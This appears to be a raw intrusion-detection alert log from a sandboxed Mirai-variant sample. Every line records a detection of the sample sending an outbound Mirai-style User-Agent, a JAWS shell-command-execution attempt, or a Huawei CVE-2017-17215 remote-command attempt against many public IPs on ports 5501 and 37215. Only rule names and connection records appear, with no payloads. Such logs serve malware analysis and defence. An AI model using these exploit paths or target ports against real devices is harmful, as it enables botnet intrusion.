                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344754130.34.76.1195501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358130131.184.118.1415501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358130131.184.118.1415501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335256102.254.62.22337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234036689.148.217.255501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234036689.148.217.255501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360764160.145.73.12737215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345776190.139.171.12337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235993864.111.66.15501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235993864.111.66.15501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341690186.83.48.337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348964197.188.244.3237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342904197.197.252.6737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347600154.232.153.1295501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2347600154.232.153.1295501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337622194.128.16.725501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337622194.128.16.725501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343390157.188.59.3637215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343242181.148.230.24637215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358512155.223.92.1105501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358512155.223.92.1105501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359492202.116.161.715501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359492202.116.161.715501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337576181.204.35.15137215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345720105.113.238.12937215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349060148.7.41.365501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349060148.7.41.365501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233951043.199.221.1605501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233951043.199.221.1605501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347552186.153.156.2135501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2347552186.153.156.2135501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337738149.115.131.1655501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337738149.115.131.1655501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233323045.234.224.2325501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233323045.234.224.2325501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357232197.232.142.18037215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348574197.181.127.16937215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360348193.135.33.375501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360348193.135.33.375501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234792023.166.194.15501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234792023.166.194.15501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334864126.92.191.605501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334864126.92.191.605501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334466169.189.163.1885501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334466169.189.163.1885501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235667688.236.28.25501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235667688.236.28.25501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359740223.13.181.20137215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341998160.208.188.2537215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235646641.7.63.4337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337006186.159.148.11237215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235326032.6.198.495501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235326032.6.198.495501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352244162.201.34.1035501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352244162.201.34.1035501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334810201.75.77.2185501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334810201.75.77.2185501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360540186.136.12.4337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235942284.170.19.1285501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235942284.170.19.1285501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351488156.86.138.15437215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235815212.19.156.405501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235815212.19.156.405501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356338160.231.184.2737215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339058160.78.234.12337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351256181.81.183.24937215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351922114.124.139.1295501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351922114.124.139.1295501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336240186.232.217.12537215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350240102.132.98.18637215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351734156.143.112.1915501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351734156.143.112.1915501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354922102.215.172.3737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233722052.248.109.735501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233722052.248.109.735501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235495220.128.55.1145501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235495220.128.55.1145501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346782105.223.41.19137215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233428875.127.155.1295501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233428875.127.155.1295501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345120160.239.174.14037215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350786223.34.128.23237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341682186.172.198.18237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336378105.162.217.18437215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346000181.31.197.13237215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346754154.64.227.55501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346754154.64.227.55501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344096186.204.137.2537215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346940181.28.36.17937215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234894479.110.15.355501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234894479.110.15.355501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358712160.243.68.515501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358712160.243.68.515501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343132156.160.148.18737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340524220.48.74.2135501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340524220.48.74.2135501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234592619.104.154.1375501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234592619.104.154.1375501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336622222.250.48.955501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336622222.250.48.955501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342488190.177.255.13337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346952103.150.65.545501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346952103.150.65.545501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342766223.161.186.4337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342450186.38.131.23137215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356650201.13.66.725501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356650201.13.66.725501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233846863.91.206.905501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233846863.91.206.905501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335702213.35.41.1785501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335702213.35.41.1785501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341724143.138.212.1635501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341724143.138.212.1635501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334396207.178.160.2065501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334396207.178.160.2065501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336154187.57.127.95501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336154187.57.127.95501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347556102.134.241.5937215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358990105.63.121.9837215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337638102.38.165.15937215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352976186.44.122.9837215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339520105.33.115.17737215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344564102.230.213.12837215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334880181.223.123.14737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337350163.113.231.895501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337350163.113.231.895501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339658173.143.218.715501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339658173.143.218.715501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353252210.254.193.1625501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353252210.254.193.1625501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236072850.241.86.2215501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.236072850.241.86.2215501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350292102.247.147.20137215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356898102.8.134.6737215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353140197.238.225.25137215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350742156.115.178.7837215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235202068.37.83.95501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235202068.37.83.95501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354186158.189.121.665501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354186158.189.121.665501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357732102.110.18.5437215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348048102.135.110.23437215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348552181.12.153.1837215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341362186.38.184.20337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359056197.11.219.15537215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235859867.162.199.2265501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235859867.162.199.2265501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354498152.121.235.2225501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354498152.121.235.2225501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350772157.43.99.1437215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350044160.25.125.15737215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354402156.247.76.13537215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233740838.18.127.1445501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233740838.18.127.1445501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335166181.116.32.17637215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354588160.89.58.19037215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344410160.83.155.11237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.236012041.140.79.19837215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343642105.234.73.10737215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336248102.141.42.4637215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23556749.146.105.315501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23556749.146.105.315501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233882096.203.92.1135501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233882096.203.92.1135501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347724197.216.47.3737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23577248.216.211.365501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23577248.216.211.365501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348642156.184.182.13437215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233598096.158.46.1455501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233598096.158.46.1455501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344622152.107.169.75501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344622152.107.169.75501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338262169.167.232.1425501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338262169.167.232.1425501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339402156.54.117.3937215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235039064.193.186.135501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235039064.193.186.135501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342534190.236.146.1337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352524105.156.116.037215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360440102.125.28.337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339498109.37.254.85501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339498109.37.254.85501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234792046.22.221.1195501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234792046.22.221.1195501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235103475.229.90.515501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235103475.229.90.515501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335278157.123.167.20037215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333624197.18.198.23237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350172181.232.241.13937215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343090181.183.186.2045501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343090181.183.186.2045501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353780102.157.186.16137215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359566186.204.43.2337215TCP
